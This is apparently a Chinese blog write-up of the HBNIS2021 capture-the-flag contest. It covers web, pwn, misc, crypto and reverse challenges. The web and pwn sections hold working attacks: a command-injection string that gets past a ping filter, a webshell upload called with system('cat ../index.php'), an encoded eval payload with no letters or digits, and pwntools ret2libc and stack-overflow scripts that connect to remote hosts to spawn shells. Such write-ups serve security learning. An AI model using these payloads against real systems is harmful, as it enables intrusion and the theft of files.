HBNIS2021 WRITEUP BY Ginkgo

Web

扫雷

src.js里面alert后面有字符串

file

base16-》base32-》base64

file

Ping

<?php
show_source(__FILE__);
header("Content-type: text/html; charset=utf-8");
echo 'flag in index.php';
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/(\||&|cat|flag|tac|more|less)/", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?> flag in index.php

paylaod:
127.0.0.1;sort *

file

ezezupload

制作一个有上传按钮的页面

<html>
<head>
<meta charset="utf-8">
<title>upload</title>
</head>
<body>

<form action="http://c693bac8.lxctf.net/" method="post" enctype="multipart/form-data">
    <label for="file">文件名:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>

</body>
</html>

上传的路径,upload/md5(文件名)
上传 webshell ,1.php

/upload/f3b94e88bd1bd325af6f62828c8785dd.php?1=system("cat ../index.php");

file

web_ssrf

file协议直接读

file

Ezexec

无数字字母rce

原题,https://www.cnblogs.com/ECJTUACM-873284962/p/9433641.html

<?php
include 'flag.php';
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(preg_match("/[A-Za-z0-9]+/",$code)){
        die("NO.");
    }
    @eval($code);
}else{
    highlight_file(__FILE__);
}
//$hint =  "php function getFlag() to get flag";
?>

payload:
code=%24%7B%7E%22%A0%B8%BA%AB%22%7D%5B%AA%5D%28%29%3B&%aa=getFlag

Translate

凯撒解密

file

cl3ver.php

原题:

https://bugs.php.net/bug.php?id=69892

整数键截断

stu[4294967296]=K3vin&stu[1]=0xkk

file

Pwn

Pwn1

ret2libc跟bypass canary

# -*- coding: utf-8 -*
from pwn import *

context.log_level = 'debug'
p=remote('129.226.4.186',9999)
#p=process("./pwn")

def Read(size,payload):
    p.sendlineafter("choice\n","1")
    p.sendlineafter("size:\n",str(size))
    p.sendafter("content:",payload)
prr = 0x4009f3 
puts_got_addr = 0x601018
puts_plt_addr = 0x04005F0
main_addr = 0x4008D7 

payload = "x"*0x108+"\n"+"\n"
Read(0x109,payload)

p.recvuntil("x"*0x108)
str_addr = u64(p.recv(8))-0xa

payload = "x"*0x108+p64(str_addr)+p64(0xdeedeed)+p64(prr)+p64(puts_got_addr)+p64(puts_plt_addr)+p64(main_addr)
Read(len(payload),payload)

p.recvline()
libc = ELF("libc-2.23.so")

addr = u64(p.recv(6).ljust(8,"\x00")) - libc.symbols["puts"]

payload = "x"*0x108+p64(str_addr)+p64(0)+p64(prr)+p64(addr + libc.search("/bin/sh\x00").next())+p64(addr + libc.symbols["system"])
Read(len(payload),payload)

p.sendlineafter("choice\n","\n")
p.interactive()
 

file

pwn2

栈溢出,用eval进行进行算数计算。

# -*- coding: utf-8 -*
from pwn import *
context.log_level = 'debug'

p = remote('129.226.4.186',30001)
#p = process('./pwn')

p.sendlineafter("3.exit\n","1")
for i in range(100):
    p.sendline(str(eval(p.recvuntil('=\n',True))))
payload = "x"*0x38+p64(0x4008DE)
p.recvuntil("name \n")
p.sendline(payload)
p.interactive()

file

Misc

交检查

doc中发现key

file

同时把word看做压缩包的话,改后缀,找到一张图片

file

通过foremost分离,

发现加密压缩包,用之前的Key解密

得到pdf和另一个加密压缩包

pdf用wbstego4.3open

file

发现了

qsxeszrfvygc753

解开压缩包之后得到.xlsx
之前GKCTF的思路

file

把1的部分标出

得到汉信码

扫码得到flag

这个base不一般

压缩包伪加密

直接扫图片发现并不是flag

直接看010

发现末尾多出来图片的base64表示

在浏览器中直接打开

下载图片,

file

拼上二维码头,发现并不对,看到右下角的小框框颜色有误

需要先反相再P定位点

得到flag

Crypto

EzCrypto

首先进行社会主义核心价值观解密,再进行W型栅栏解密

根据base64加密flag开头数据为ZMX,所以当栅栏结尾为ZMX时,栏数为5

再进行倒置使用base64解密

7时已到

8进制转文本

file

type7在线

file

w型栅栏密码

file

凯撒在线解码

file

Reverse

MAP

有upx,脱之,迷宫,从ida中提取,10*6,走即可。

file

apk

原题,从网上找了给脚本可以解密。

source = "abcdefghijklmnopqrstuvwxyz0123456789{}!_ABCDEFGHIJKLMNOPQRSTUVWXYZ"
key = "iodj_ZhOf3phCDqguR4gA"
LEN = len(source)
flag = ''
for i in range(len(key)):
    for j in range(len(source)):
        if source[j] == key[i]:
            k = j
            if k == 2:
                k = LEN + 2
            if k == 1:
                k = LEN + 1
            if k == 0:
                k = LEN
            flag += source[k-3]
print (flag)
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇